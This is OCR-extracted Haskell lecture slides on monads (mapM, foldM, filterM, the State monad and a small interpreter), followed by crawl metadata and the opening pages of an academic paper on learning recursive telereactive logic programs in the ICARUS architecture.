>>= f \] “Apply } f \text{ to every object in } m \text{ and collect the results in the same Monad” sequence: “Execute” a List of Actions in Monad-Land Change a list of Monad-wrapped objects into a Monad-wrapped list of objects \[ \text{sequence} :: [\text{m a}] \to \text{m} [\text{a}] \] \[ \text{sequence}_\_ :: [\text{m a}] \to \text{m} () \] Prelude> \text{sequence} [\text{print 1, print 2, print 3}] 1 2 3 [(),(),()] Prelude> \text{sequence}_\_ [\text{putStrLn "Hello", putStrLn "World"}] Hello World Works more generally on Traversable types, not just lists mapM: Map Over a List in Monad-Land \[ \text{mapM} :: \text{Monad } m \Rightarrow (a \rightarrow m b) \rightarrow [a] \rightarrow m [b] \] \[ \text{mapM} _ :: \text{Monad } m \Rightarrow (a \rightarrow m b) \rightarrow [a] \rightarrow m () \quad -- \text{Discard result} \] Add 10 to each list element and log having seen it: \[ \text{> p10 x = writer } (x+10, ["saw " ++ show x]) :: \text{Writer } [\text{String}] \text{ Int} \] \[ \text{> runWriter } \$ \text{mapM p10 } [1..3] \] \[ ([11,12,13],["saw 1","saw 2","saw 3"]) \] Printing the elements of a list is my favorite use of mapM_: \[ \text{> mapM_ print } ([1..3] :: [\text{Int}]) \] \[ 1 2 3 \] Works more generally on Traversable types, not just lists Control.Monad.foldM: Left-Fold a List in Monad-Land \[ \text{foldl} :: \quad (a \rightarrow b \rightarrow a) \rightarrow a \rightarrow [b] \rightarrow a \] In \text{foldM}, the folding function operates and returns a result in a Monad: \[ \text{foldM} :: \text{Monad} m =\Rightarrow (a \rightarrow b \rightarrow m a) \rightarrow a \rightarrow [b] \rightarrow m a \] \[ \text{foldM} f a1 [x1, x2, \ldots, xm] = \text{do} \quad a2 <- f a1 x1 \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad a3 <- f a2 x2 \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad \ldots \\ \phantom{\text{do} \quad a2 <- f a1 x1} \quad f a m x m \] Example: Sum a list of numbers and report progress \[ > \text{runWriter} \$ \text{foldM} (\backslash a \ x \rightarrow \text{writer} (a+x, [(x,a)])) \ 0 \ [1..4] \] \[ (10,[(1,0),(2,1),(3,3),(4,6)]) \] “Add value \( x \) to accumulated result \( a \); log \( x \) and \( a \)” \[ \backslash a \ x \rightarrow \text{writer} (a+x, [(x,a)]) \] **Control.Monad.filterM**: Filter a List in Monad-land ```haskell filter :: (a -> Bool) -> [a] -> [a] filter p = foldr (\x acc -> if p x then x : acc else acc) [] ``` ```haskell filterM :: Monad m => (a -> m Bool) -> [a] -> m [a] filterM p = foldr (\x -> liftM2 (\k -> if k then (x:) else id) (p x)) (return []) (return []) ``` **filterM in action**: preserve small list elements; log progress ```haskell isSmall :: Int -> Writer [String] Bool isSmall x | x < 4 = writer (True, ["keep " ++ show x]) | otherwise = writer (False, ["reject " ++ show x]) ``` ```haskell > fst $ runWriter $ filterM isSmall [9,1,5,2,10,3] [1,2,3] > snd $ runWriter $ filterM isSmall [9,1,5,2,10,3] ["reject 9","keep 1","reject 5","keep 2","reject 10","keep 3"] ``` An Aside: Computing the Powerset of a List For a list \([x_1, x_2, \ldots]\), the answer consists of two kinds of lists: \[ \begin{bmatrix} [x_1, x_2, \ldots], \ldots, [x_1], [x_2, x_3, \ldots], \ldots, [] \end{bmatrix} \] - start with \(x_1\) - do not start with \(x_1\) \[ powerset :: [a] \rightarrow [[a]] \] \[ powerset [] = [[]] \quad \text{-- Tricky base case: } 2^\varnothing = \{\varnothing\} \] \[ powerset (x:xs) = \text{map} \ (x:) \ (\text{powerset} \ xs) ++ \text{powerset} \ xs \] \[ *\text{Main}*> \text{powerset} \ "abc" \[ ["abc","ab","ac","a","bc","b","c",""] \] The List Monad and Powersets \[ \text{powerset} (x:xs) = \text{map} (x:) (\text{powerset} \ xs) ++ \text{powerset} \ xs \] Let’s perform this step (i.e., possibly prepending \(x\) and combining) using the list Monad. Recall \(\text{liftM2}\) applies Monadic arguments to a two-input function: \[ \text{liftM2} :: \text{Monad} \ m \Rightarrow (a \to b \to c) \to m \ a \to m \ b \to m \ c \] So, for example, if \(a = \text{Bool}\), \(b \& c = [\text{Char}]\), and \(m\) is a list, \[ \text{listM2} :: (\text{Bool} \rightarrow [\text{Char}] \rightarrow [\text{Char}]) \rightarrow [\text{Bool}] \rightarrow [[\text{Char}]] \rightarrow [[\text{Char}]] \] \[ > \text{liftM2} (\lambda k \rightarrow \text{if } k \text{ then ('a':) else id}) \ [\text{True, False}] \ [["bc", "d"]\n\ ["abc","ad","bc","d"] \] \(\text{liftM2}\) makes the function “nondeterministic” by applying the function with every \(\text{Bool}\) in the first argument, i.e., both \(k = \text{True}\) (include ‘\(a\’) and \(k = \text{False}\) (do not include ‘\(a\’) ), to every string in the second argument (\(["bc","d"]\) ) filterM Computes a Powerset: Like a Haiku, but shorter \[ \text{foldr } f \ z \ [x_1, x_2, \ldots, x_n] = f \ x_1 \ (f \ x_2 \ (\ldots \ (f \ x_n \ z) \ldots)) \] \[ \text{filterM } p \ = \ \text{foldr} \ (\lambda x \rightarrow \text{liftM2} \ (\lambda k \rightarrow \text{if } k \text{ then } (x:) \text{ else } \text{id}) \ (p \ x)) \ (\text{return } []) \] \[ \text{filterM } p \ [x_1, x_2, \ldots, x_n] = \] \[ \text{liftM2} \ (\lambda k \rightarrow \text{if } k \text{ then } (x_1:) \text{ else } \text{id}) \ (p \ x_1) \] \[ \ (\text{liftM2} \ (\lambda k \rightarrow \text{if } k \text{ then } (x_2:) \text{ else } \text{id}) \ (p \ x_2) \] \[ \ldots \] \[ \ (\text{liftM2} \ (\lambda k \rightarrow \text{if } k \text{ then } (x_n:) \text{ else } \text{id}) \ (p \ x_n) \ (\text{return } [])) \ldots \] If we let \( p \_ = [\text{True, False}] \), this chooses to prepend \( x_1 \) or not to the result of prepending \( x_2 \) or not to ... to \( \text{return } [] = [[]] \) \[ \text{Prelude}\> \text{filterM} \ (\_ \rightarrow [\text{True, False}]) \ "abc" \["abc","ab","ac","a","bc","b","c","""] \] Functions as Monads Much like functions are applicative functors, functions are Monads that apply the same argument to all their constituent functions. ```haskell instance Monad ((->) r) where return x = \_ -> x -- Just produce x h >>= f = \w -> f (h w) w -- Apply w to h and f import Data.Char isIDChar :: Char -> Bool -- ((->) Char) is the Monad isIDChar = do l <- isLetter -- The Char argument n <- isDigit -- is applied to underscore <- (=='_') -- all three of these functions return $ l || n || underscore -- before their results are ORed *Main> map isIDChar "12 aB_" [True,True,False,True,True,True,True] ``` The State Monad: Modeling Computations with Side-Effects The Writer Monad can only add to a state, not observe it. The State Monad addresses this by passing a state to each operation. In Control.Monad.State, ```haskell newtype State s a = State { runState :: s -> (a, s) } instance Monad (State s) where return x = State $ \s -> (x, s) State h >>= f = State $ \s -> let (a, s') = h s -- First step State g = f a -- Pass result in g s' -- Second step get = State $ \s -> (s, s) -- Make the state the result put s = State $ _ -> ((), s) -- Set the state modify f = State $ \s -> ((), f s) -- Apply a state update function ``` State **is not a state**; it more resembles a state machine’s **next state function** a is the return value s is actually a state Example: An Interpreter for a Simple Imperative Language ```haskell import qualified Data.Map as Map type Store = Map.Map String Int -- Value of each variable -- Representation of a program (an AST) data Expr = Lit Int -- Numeric literal: 42 | Add Expr Expr -- Addition: 1 + 3 | Var String -- Variable reference: a | Asn String Expr -- Variable assignment: a = 3 + 1 | Seq [Expr] -- Sequence of expressions: a = 3; b = 4; p :: Expr p = Seq [ Asn "a" (Lit 3) -- a = 3; , Asn "b" (Add (Var "a") (Lit 1)) -- b = a + 1; , Add (Add (Var "a") bpp) -- a + (b = b + 1) + b; (Var "b") ] where bpp = Asn "b" (Add (Var "b") (Lit 1)) ``` Example program: Example: The Eval Function Taking a Store \[ \begin{align*} \text{eval} & : \text{Expr} \to \text{Store} \to (\text{Int}, \text{Store}) \\ \text{eval} (\text{Lit } n) & \quad s = (n, s) \quad -- \text{Store unchanged} \\ \text{eval} (\text{Add } e_1 e_2) & \quad s = \begin{cases} \text{let } (n_1, s') = \text{eval } e_1 s \\ (n_2, s'') = \text{eval } e_2 s' \end{cases} \quad -- \text{Sees eval } e_1 \\ & \quad \text{in } (n_1 + n_2, s'') \quad -- \text{Sees eval } e_2 \\ \text{eval} (\text{Var } v) & \quad s = \begin{cases} \text{case } \text{Map.lookup } v s \text{ of} \\ \text{Just } n & \to (n, s) \\ \text{Nothing} & \to \text{error }$ v ++ " undefined" \end{cases} \\ \text{eval} (\text{Asn } v e) & \quad s = \begin{cases} \text{let } (n, s') = \text{eval } e s \\ \text{in } (n, \text{Map.insert } v n s') \quad -- \text{Sees eval } e \end{cases} \\ \text{eval} (\text{Seq } es) & \quad s = \text{foldl } (\_\_ s s) \to \text{eval } e s s) (0, s) es \end{align*} \] The fussy part here is “threading” the state through the computations Example: The Eval Function in Uncurried Form \[ \text{eval :: \text{Expr} \rightarrow \text{Store} \rightarrow (\text{Int}, \text{Store})} \] \[ \text{eval (Lit n) = \lambda s \rightarrow (n, s)} \quad \text{-- Store unchanged} \] \[ \text{eval (Add e1 e2) = \lambda s \rightarrow \text{let} \ (n1, s') = \text{eval e1 } s \] \[ \text{\hspace{1cm} (n2, s'') = \text{eval e2 } s' \] \[ \text{\hspace{2cm} in (n1 + n2, s'')} \quad \text{-- Sees eval e1} \] \[ \text{\hspace{2cm} Sees eval e2} \] \[ \text{eval (Var v) = \lambda s \rightarrow } \] \[ \text{\hspace{1cm} case Map.lookup v s of} \] \[ \text{\hspace{2cm} Just n \rightarrow (n, s)} \quad \text{-- Look up v} \] \[ \text{\hspace{2cm} Nothing \rightarrow \text{error } $v ++ " undefined"}$ \] \[ \text{eval (Asn v e) = \lambda s \rightarrow \text{let} \ (n, s') = \text{eval e } s \] \[ \text{\hspace{2cm} in (n, Map.insert v n s')} \quad \text{-- Sees eval e} \] \[ \text{eval (Seq es) = \lambda s \rightarrow \text{foldl} (\lambda(_, ss) e \rightarrow \text{eval e ss}) (0, s) es} \] The parentheses around \text{Store -> (Int, Store)} are unnecessary. Example: The Eval Function Using the State Monad $$\text{eval} :: \text{Expr} \rightarrow \text{State Store Int}$$ $$\text{eval} (\text{Lit n}) = \text{return } n \quad \text{-- Store unchanged}$$ $$\text{eval} (\text{Add e1 e2}) = \text{do } n1 <- \text{eval e1}$$ $$\quad \quad \quad n2 <- \text{eval e2} \quad \text{-- Sees eval e1}$$ $$\quad \quad \quad \text{return } \$ n1 + n2 \quad \text{-- Sees eval e2}$$ $$\text{eval} (\text{Var v}) = \text{do } s <- \text{get}$$ $$\quad \quad \quad \text{case Map.lookup v s of} \quad \text{-- Get the store}$$ $$\quad \quad \quad \quad \text{Just n } \rightarrow \text{return } n \quad \text{-- Look up v}$$ $$\quad \quad \quad \quad \text{Nothing } \rightarrow \text{error } \$ v ++ " undefined"$$ $$\text{eval} (\text{Asn v e}) = \text{do } n <- \text{eval e}$$ $$\quad \quad \quad \text{modify } \$ \text{Map.insert v n} \quad \text{-- Sees eval e}$$ $$\quad \quad \quad \text{return } n \quad \text{-- Assigned value}$$ $$\text{eval} (\text{Seq es}) = \text{foldM } (\_ e \rightarrow \text{eval e}) 0 \text{ es} \quad \text{-- Ignore value}$$ The >>= operator threads the state through the computation The Eval Function in Action: runState, evalState, and execState \[ \begin{align*} a &= 3; \\ b &= a + 1; \\ a + (b = b + 1) + b \end{align*} \] *Main> :t runState (eval p) Map.empty runState (eval p) Map.empty :: (Int, Store) -- (Result, State) *Main> :t evalState (eval p) Map.empty evalState (eval p) Map.empty :: Int -- Result only *Main> evalState (eval p) Map.empty 13 *Main> :t execState (eval p) Map.empty execState (eval p) Map.empty :: Store -- State only *Main> Map.toList $ execState (eval p) Map.empty ["a",3,"b",5] Harnessing Monads ```haskell data Tree a = Leaf a | Branch (Tree a) (Tree a) deriving Show A function that works in a Monad can harness any Monad: ```haskell mapTreeM :: Monad m => (a -> m b) -> Tree a -> m (Tree b) mapTreeM f (Leaf x) = do x' <- f x return $ Leaf x' mapTreeM f (Branch l r) = do l' <- mapTreeM f l r' <- mapTreeM f r return $ Branch l' r' ``` ```haskell toList :: Tree a -> [a] toList t = execWriter $ mapTreeM (\x -> tell [x]) t -- Log each leaf ``` ```haskell foldTree :: (a -> b -> b) -> b -> Tree a -> b foldTree f s0 t = execState (mapTreeM (\x -> modify (f x)) t) s0 ``` ```haskell sumTree :: Num a => Tree a -> a sumTree t = foldTree (+) 0 t -- Accumulate values using stateful fold ``` Harnessing Monads *Main> simpleTree = Branch (Leaf (1 :: Int)) (Leaf 2) *Main> toList simpleTree [1,2] *Main> sumTree simpleTree 3 *Main> mapTreeM (\x -> Just (x + 10)) simpleTree Just (Branch (Leaf 11) (Leaf 12)) *Main> mapTreeM print simpleTree 1 2 *Main> mapTreeM (\x -> [x, x+10]) simpleTree [Branch (Leaf 1) (Leaf 2), Branch (Leaf 1) (Leaf 12), Branch (Leaf 11) (Leaf 2), Branch (Leaf 11) (Leaf 12)]
{"Source-Url": "http://www1.cs.columbia.edu/~sedwards/classes/2020/4995-fall/monads.pdf", "len_cl100k_base": 10014, "olmocr-version": "0.1.53", "pdf-total-pages": 43, "total-fallback-pages": 0, "total-input-tokens": 74996, "total-output-tokens": 12317, "length": "2e13", "weborganizer": {"__label__adult": 0.0003993511199951172, "__label__art_design": 0.0003552436828613281, "__label__crime_law": 0.0002734661102294922, "__label__education_jobs": 0.0005679130554199219, "__label__entertainment": 6.979703903198242e-05, "__label__fashion_beauty": 0.00012624263763427734, "__label__finance_business": 9.572505950927734e-05, "__label__food_dining": 0.0004398822784423828, "__label__games": 0.0005192756652832031, "__label__hardware": 0.0005669593811035156, "__label__health": 0.0003814697265625, "__label__history": 0.00021207332611083984, "__label__home_hobbies": 9.524822235107422e-05, "__label__industrial": 0.0003287792205810547, "__label__literature": 0.00028395652770996094, "__label__politics": 0.00023853778839111328, "__label__religion": 0.0005359649658203125, "__label__science_tech": 0.006038665771484375, "__label__social_life": 0.0001010894775390625, "__label__software": 0.0033283233642578125, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.0003018379211425781, "__label__transportation": 0.000438690185546875, "__label__travel": 0.00020396709442138672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29144, 0.03266]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29144, 0.55045]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29144, 0.53782]], "google_gemma-3-12b-it_contains_pii": [[0, 59, false], [59, 435, null], [435, 1216, null], [1216, 1627, null], [1627, 2399, null], [2399, 3054, null], [3054, 3974, null], [3974, 4536, null], [4536, 4916, null], [4916, 5381, null], [5381, 5864, null], [5864, 6352, null], [6352, 6945, null], [6945, 7469, null], [7469, 7855, null], [7855, 8519, null], [8519, 9109, null], [9109, 9867, null], [9867, 10259, null], [10259, 10984, null], [10984, 11606, null], [11606, 12058, null], [12058, 12557, null], [12557, 13844, null], [13844, 14315, null], [14315, 15279, null], [15279, 16164, null], [16164, 16636, null], [16636, 17358, null], [17358, 18328, null], [18328, 19089, null], [19089, 19675, null], [19675, 20772, null], [20772, 21884, null], [21884, 22516, null], [22516, 23386, null], [23386, 24133, null], [24133, 25189, null], [25189, 26317, null], [26317, 27477, null], [27477, 28012, null], [28012, 28736, null], [28736, 29144, null]], "google_gemma-3-12b-it_is_public_document": [[0, 59, true], [59, 435, null], [435, 1216, null], [1216, 1627, null], [1627, 2399, null], [2399, 3054, null], [3054, 3974, null], [3974, 4536, null], [4536, 4916, null], [4916, 5381, null], [5381, 5864, null], [5864, 6352, null], [6352, 6945, null], [6945, 7469, null], [7469, 7855, null], [7855, 8519, null], [8519, 9109, null], [9109, 9867, null], [9867, 10259, null], [10259, 10984, null], [10984, 11606, null], [11606, 12058, null], [12058, 12557, null], [12557, 13844, null], [13844, 14315, null], [14315, 15279, null], [15279, 16164, null], [16164, 16636, null], [16636, 17358, null], [17358, 18328, null], [18328, 19089, null], [19089, 19675, null], [19675, 20772, null], [20772, 21884, null], [21884, 22516, null], [22516, 23386, null], [23386, 24133, null], [24133, 25189, null], [25189, 26317, null], [26317, 27477, null], [27477, 28012, null], [28012, 28736, null], [28736, 29144, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, true], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29144, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29144, null]], "pdf_page_numbers": [[0, 59, 1], [59, 435, 2], [435, 1216, 3], [1216, 1627, 4], [1627, 2399, 5], [2399, 3054, 6], [3054, 3974, 7], [3974, 4536, 8], [4536, 4916, 9], [4916, 5381, 10], [5381, 5864, 11], [5864, 6352, 12], [6352, 6945, 13], [6945, 7469, 14], [7469, 7855, 15], [7855, 8519, 16], [8519, 9109, 17], [9109, 9867, 18], [9867, 10259, 19], [10259, 10984, 20], [10984, 11606, 21], [11606, 12058, 22], [12058, 12557, 23], [12557, 13844, 24], [13844, 14315, 25], [14315, 15279, 26], [15279, 16164, 27], [16164, 16636, 28], [16636, 17358, 29], [17358, 18328, 30], [18328, 19089, 31], [19089, 19675, 32], [19675, 20772, 33], [20772, 21884, 34], [21884, 22516, 35], [22516, 23386, 36], [23386, 24133, 37], [24133, 25189, 38], [25189, 26317, 39], [26317, 27477, 40], [27477, 28012, 41], [28012, 28736, 42], [28736, 29144, 43]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29144, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
e1df1d149485cea210da8fbc9c56b91a04a37dc5
[REMOVED]
{"Source-Url": "https://dc.exa.unrc.edu.ar/staff/naguirre/papers/icfem2004b.pdf", "len_cl100k_base": 8724, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 46249, "total-output-tokens": 10295, "length": "2e13", "weborganizer": {"__label__adult": 0.0003173351287841797, "__label__art_design": 0.00031256675720214844, "__label__crime_law": 0.00028777122497558594, "__label__education_jobs": 0.0004911422729492188, "__label__entertainment": 3.9517879486083984e-05, "__label__fashion_beauty": 0.00012803077697753906, "__label__finance_business": 0.00017213821411132812, "__label__food_dining": 0.00032019615173339844, "__label__games": 0.0003528594970703125, "__label__hardware": 0.0006093978881835938, "__label__health": 0.0003933906555175781, "__label__history": 0.0001933574676513672, "__label__home_hobbies": 8.308887481689453e-05, "__label__industrial": 0.000377655029296875, "__label__literature": 0.0001908540725708008, "__label__politics": 0.00022041797637939453, "__label__religion": 0.00044345855712890625, "__label__science_tech": 0.00893402099609375, "__label__social_life": 7.027387619018555e-05, "__label__software": 0.003971099853515625, "__label__software_dev": 0.9814453125, "__label__sports_fitness": 0.0002574920654296875, "__label__transportation": 0.0004062652587890625, "__label__travel": 0.0001931190490722656}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 37007, 0.00938]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 37007, 0.23634]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 37007, 0.82509]], "google_gemma-3-12b-it_contains_pii": [[0, 2350, false], [2350, 5711, null], [5711, 7277, null], [7277, 9655, null], [9655, 12031, null], [12031, 15177, null], [15177, 17805, null], [17805, 20250, null], [20250, 23005, null], [23005, 25216, null], [25216, 26166, null], [26166, 28827, null], [28827, 31780, null], [31780, 34696, null], [34696, 37007, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2350, true], [2350, 5711, null], [5711, 7277, null], [7277, 9655, null], [9655, 12031, null], [12031, 15177, null], [15177, 17805, null], [17805, 20250, null], [20250, 23005, null], [23005, 25216, null], [25216, 26166, null], [26166, 28827, null], [28827, 31780, null], [31780, 34696, null], [34696, 37007, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 37007, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 37007, null]], "pdf_page_numbers": [[0, 2350, 1], [2350, 5711, 2], [5711, 7277, 3], [7277, 9655, 4], [9655, 12031, 5], [12031, 15177, 6], [15177, 17805, 7], [17805, 20250, 8], [20250, 23005, 9], [23005, 25216, 10], [25216, 26166, 11], [26166, 28827, 12], [28827, 31780, 13], [31780, 34696, 14], [34696, 37007, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 37007, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
056e0a7a8405bf6d69c1ef700ab6fe4e596ff4cc
[REMOVED]
{"len_cl100k_base": 13553, "olmocr-version": "0.1.53", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 35098, "total-output-tokens": 16639, "length": "2e13", "weborganizer": {"__label__adult": 0.00038051605224609375, "__label__art_design": 0.0006589889526367188, "__label__crime_law": 0.0006699562072753906, "__label__education_jobs": 0.0013055801391601562, "__label__entertainment": 0.00020015239715576172, "__label__fashion_beauty": 0.00022971630096435547, "__label__finance_business": 0.0011358261108398438, "__label__food_dining": 0.00034117698669433594, "__label__games": 0.000820159912109375, "__label__hardware": 0.002105712890625, "__label__health": 0.0008082389831542969, "__label__history": 0.0004718303680419922, "__label__home_hobbies": 0.00018787384033203125, "__label__industrial": 0.00079345703125, "__label__literature": 0.0004506111145019531, "__label__politics": 0.00046372413635253906, "__label__religion": 0.0005202293395996094, "__label__science_tech": 0.42919921875, "__label__social_life": 0.00016605854034423828, "__label__software": 0.040252685546875, "__label__software_dev": 0.517578125, "__label__sports_fitness": 0.00023996829986572263, "__label__transportation": 0.0005230903625488281, "__label__travel": 0.0002149343490600586}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 61638, 0.04558]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 61638, 0.19043]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 61638, 0.8712]], "google_gemma-3-12b-it_contains_pii": [[0, 5476, false], [5476, 12609, null], [12609, 20809, null], [20809, 26493, null], [26493, 34324, null], [34324, 41004, null], [41004, 47415, null], [47415, 53075, null], [53075, 61638, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5476, true], [5476, 12609, null], [12609, 20809, null], [20809, 26493, null], [26493, 34324, null], [34324, 41004, null], [41004, 47415, null], [47415, 53075, null], [53075, 61638, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 61638, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 61638, null]], "pdf_page_numbers": [[0, 5476, 1], [5476, 12609, 2], [12609, 20809, 3], [20809, 26493, 4], [26493, 34324, 5], [34324, 41004, 6], [41004, 47415, 7], [47415, 53075, 8], [53075, 61638, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 61638, 0.11221]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
f28a5f6d6930637a8d1ae066a075c60409cab47d
Learning Recursive Control Programs from Problem Solving Pat Langley Dongkyu Choi Computational Learning Laboratory Center for the Study of Language and Information Stanford University, Stanford, CA 94305–4115 USA Editor: Roland Olsson and Ute Schmid Abstract In this paper, we propose a new representation for physical control – telereactive logic programs – along with an interpreter that uses them to achieve goals. In addition, we present a new learning method that acquires recursive forms of these structures from traces of successful problem solving. We report experiments in three different domains that demonstrate the generality of this approach. In closing, we review related work on learning complex skills and discuss directions for future research on this topic. Keywords: telereactive control, logic programs, problem solving, skill learning 1. Introduction Human skills have a hierarchical character, with complex procedures defined in terms of more basic ones. In some domains, these skills are recursive in nature, in that structures are specified in terms of calls to themselves. Such recursive procedures pose a clear challenge for machine learning that deserves more attention than it has received in the literature. In this paper we present one response to this problem that relies on a new representation for skills and a new method for acquiring them from experience. We focus here on the task of learning controllers for physical agents. We are concerned with acquiring the structure and organization of skills, rather than tuning their parameters, which we view as a secondary learning issue. We represent skills as telereactive logic programs, a formalism that incorporates ideas from logic programming, reactive control, and hierarchical task networks. This framework can encode hierarchical and recursive procedures that are considerably more complex than those usually studied in research on reinforcement learning (Sutton & Barto, 1998) and behavioral cloning (Sammut, 1996), but they can still be executed in a reactive yet goal-directed manner. As we will see, it also embodies constraints that make the learning process tractable. We assume that an agent uses hierarchical skills to achieve its goals whenever possible, but also that, upon encountering unfamiliar tasks, it falls back on problem solving. The learner begins with primitive skills for the domain, including knowledge of their applicability conditions and their effects, which lets it compose them to form candidate solutions. When the system overcomes such an impasse successfully, which may require substantial search, it learns a new skill that it stores in memory for use on future tasks. Thus, skill acquisition is incremental and intertwined with problem solving. Moreover, learning is cumulative in that skills acquired early on form the building blocks for those mastered later. We have incorporated our assumptions about representation, performance, and learning into ICARUS, a cognitive architecture for controlling physical agents. Any approach to acquiring hierarchical and recursive procedures from problem solving must address three issues. These concern identifying the hierarchical organization of the learned skills, determining when different skills should have the same name or head, and inferring the conditions under which each skill should be invoked. To this end, our approach to constructing teleoreactive logic programs incorporates ideas from previous work on learning and problem solving, but it also introduces some important innovations. In the next section, we specify our formalism for encoding initial and learned knowledge, along with the performance mechanisms that interpret them to produce behavior. After this, we present an approach to problem solving on novel tasks and a learning mechanism that transforms the results of this process into executable logic programs. Next, we report experimental evidence that the method can learn control programs in three recursive domains, as well as use them on tasks that are more complex than those on which they were acquired. We conclude by reviewing related work on learning and proposing some important directions for additional research. 2. Teleoreactive Logic Programs As we have noted, our approach revolves around a representational formalism for the execution of complex procedures – teleoreactive logic programs. We refer to these structures as “logic programs” because their syntax is similar to the Horn clauses used in Prolog and related languages. We have borrowed the term “teleoreactive” from Nilsson (1994), who used it to refer to systems that are goal driven but that also react to their current environment. His examples incorporated symbolic control rules but were not cast as logic programs, as we assume here. A teleoreactive logic program consists of two interleaved knowledge bases. One specifies a set of concepts that the agent uses to recognize classes of situations in the environment and describe them at higher levels of abstraction. These monotonic inference rules have the same semantics as clauses in Prolog and a similar syntax. Each clause includes a single head, stated as a predicate with zero or more arguments, along with a body that includes one or more positive literals, negative literals, or arithmetic tests. In this paper, we assume that a given head appears in only one clause, thus constraining definitions to be conjunctive, although the formalism itself allows disjunctive concepts. ICARUS distinguishes between primitive conceptual clauses, which refer only to percepts that the agent can observe in the environment, and complex clauses, which refer to other concepts in their bodies. Specific percepts play the same role as ground literals in traditional logic programs, but, because they come from the environment and change over time, we do not consider them part of the program. Table 1 presents some concepts from the Blocks World. Concepts like unstackable and pickupable are defined in terms of the concepts clear, on, ontable, and hand-empty, the subconcept clear is defined in terms of on, and on is defined using two cases of the percept block, along with arithmetic tests on their attributes. Table 1: Examples of concepts from the Blocks World. | (hand-empty) :percepts ((hand ?hand status ?status)) :tests ((eq ?status empty)) | | A second knowledge base contains a set of skills that the agent can execute in the world. Each skill clause includes a head (a predicate with zero or more arguments) and a body that specifies a set of start conditions and one or more components. Primitive clauses have a single start condition (often a nonprimitive concept) and refer to executable actions that alter the environment. They also specify the effects of their execution, stated as literals that hold after their completion, and may state requirements that must hold during their execution. Table 2 shows the four primitive skills for the Blocks World, which are similar in structure and spirit to STRIPS operators, but may be executed in a durative manner. In contrast, nonprimitive skill clauses specify how to decompose activity into subskills. Because a skill may refer to itself, either directly or through a subskill, the formalism 